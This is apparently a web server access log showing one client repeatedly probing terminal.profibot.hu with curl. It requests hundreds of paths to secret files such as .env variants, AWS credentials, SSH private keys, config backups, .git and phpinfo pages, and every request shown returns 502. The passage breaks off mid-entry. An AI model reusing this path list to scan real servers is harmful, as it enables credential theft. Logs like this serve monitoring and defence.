[Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/main/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/cache/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/storage/app/private/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/storage/logs/laravel.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/composer.lock" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/server.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/dump.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/php5.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/src/app.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/server-info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/docker.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/pi.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/test.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.backup" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/aws-credentials.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/api/info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/config.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/%c0" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials/admin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.azure-pipelines.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.bitbucket-pipelines.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.bitbucket/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.boto" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.bzr/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.c9/metadata/environment/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.circleci/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.circleci/config.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.dockerignore" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.env-db" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.env.back" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.env.bkp" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:44 +0000] - - 502 - GET https terminal.profibot.hu "/.env.credentials" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.email" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.hidden" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.hide" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.mail" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.smtp" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.swp" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.testing" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env.uat" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env_aws" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env_backup" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env_copy" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env_private" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env_secret" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.env~" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.git/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.git/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.github/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.github/workflows/*.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.gitignore" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab-ci.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab-ci/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.hg/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.htaccess" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.idea/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.next/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.npmrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.nuxt/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.output/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.pypirc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.remote" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.ssh/id_rsa" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:45 +0000] - - 502 - GET https terminal.profibot.hu "/.ssh/id_rsa.pub" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.svn/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.travis.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.vite/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.vscode/settings.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/openid-configuration" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/security.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/07-accessing-data/begin/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/07-accessing-data/end/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/08-routing/begin/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/08-routing/end/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/09-managing-state/begin/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/09-managing-state/end/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/123.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/3-sequelize/final/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/31_structure_tests/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?p=info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?p=php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo=1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/?q=info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/__debug__" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/__debugbar" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/__tests__/test-become/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_astro/[chunk-name].[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_dev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_ignition/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/945-34f67d7c0866cf61b970.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/%5B...not-found%5D/page-63e952e68a371605.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/error.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/global-error.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/layout-a908fe02173ed4b1.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/framework-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/main-app-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-a9fba37d935ce3f3.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-d1b5411bacd03f02.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-d25b242610000153a081.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/webpack-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:46 +0000] - - 502 - GET https terminal.profibot.hu "/_static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/a.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/acme-challenge/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/acme/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/acme_challenges/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/actions-server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/actuator/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin-api/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin-panel/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/admin/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/adminapp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/adminer.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/adminer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/administrator/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/adminphp.php'" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/agora/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/alpha/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/anaconda/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apache.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apache/i.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apache/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apache/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apache2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/apc.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api-server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.back" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/debug" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/docs/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/info.php" [Client 